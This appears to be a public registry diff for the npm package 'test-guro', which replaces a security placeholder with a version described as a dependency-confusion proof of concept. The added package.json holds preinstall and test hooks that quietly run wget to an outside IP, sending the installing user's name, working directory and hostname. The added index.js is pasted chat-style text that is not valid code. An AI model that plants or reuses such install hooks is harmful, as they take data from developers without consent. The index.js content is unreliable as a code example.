test-guro 0.0.1-security → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of test-guro might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +14 -0
  2. package/package.json +18 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+ Here is a full example of a JavaScript script that demonstrates how to retrieve and use environment variables:
2
+
3
+ Copy code
4
+ // Require the dotenv package to load environment variables from a .env file
5
+ require('dotenv').config();
6
+
7
+ // Access the MY_VARIABLE environment variable
8
+ console.log(process.env.MY_VARIABLE);
9
+
10
+ // Set the MY_VARIABLE environment variable
11
+ process.env.MY_VARIABLE = 'hello world';
12
+
13
+ // Print the updated value of MY_VARIABLE
14
+ console.log(process.env.MY_VARIABLE);
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
1
  {
2
2
  "name": "test-guro",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "1.0.4",
4
+ "description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"http://192.168.1.150:443/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
8
+ "preinstall": "wget --quiet \"http://192.168.1.150:443/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
9
+ },
10
+ "keywords": [
11
+ "test",
12
+ "PoC"
13
+ ],
14
+ "dependencies": {},
15
+ "config": {
16
+ "unsafe-perm":true
17
+ },
18
+ "author": "practiccollie_npm",
19
+ "license": "ISC"
20
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=test-guro for more information.